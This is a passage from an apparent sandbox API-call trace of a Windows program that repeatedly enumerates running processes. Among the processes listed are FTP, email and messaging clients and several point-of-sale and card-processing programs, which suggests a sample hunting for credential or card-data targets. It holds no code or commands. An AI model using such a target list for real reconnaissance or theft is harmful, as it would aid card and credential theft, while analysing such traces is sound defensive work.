returned 1 [0223.373] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0223.375] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0223.377] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0223.379] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0223.425] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0223.428] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0223.430] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0223.432] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0223.434] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0223.436] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0223.438] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0223.441] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0223.442] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0223.444] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0223.446] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0223.448] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0223.450] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0223.452] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0223.454] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0223.456] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0223.458] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0223.459] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0223.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0223.500] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0223.501] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0223.503] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0223.505] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.507] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.508] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0223.511] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.513] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.514] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0223.516] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.517] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0223.518] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.520] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0223.522] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.523] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0223.525] CloseHandle (hObject=0x1eb8) returned 1 [0223.525] Sleep (dwMilliseconds=0x64) [0223.556] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0223.569] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.571] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.572] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.574] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.575] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.577] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.578] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.580] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.581] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.583] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.584] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.586] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.587] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.589] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.590] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.591] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.593] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.594] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.596] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.598] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.599] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.601] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.604] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.606] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.608] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.609] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.611] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0223.612] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0223.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.620] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.622] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.623] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.625] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0223.626] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.628] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.630] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.631] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0223.633] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0223.634] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0223.636] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0223.638] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0223.639] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0223.641] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0223.682] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, 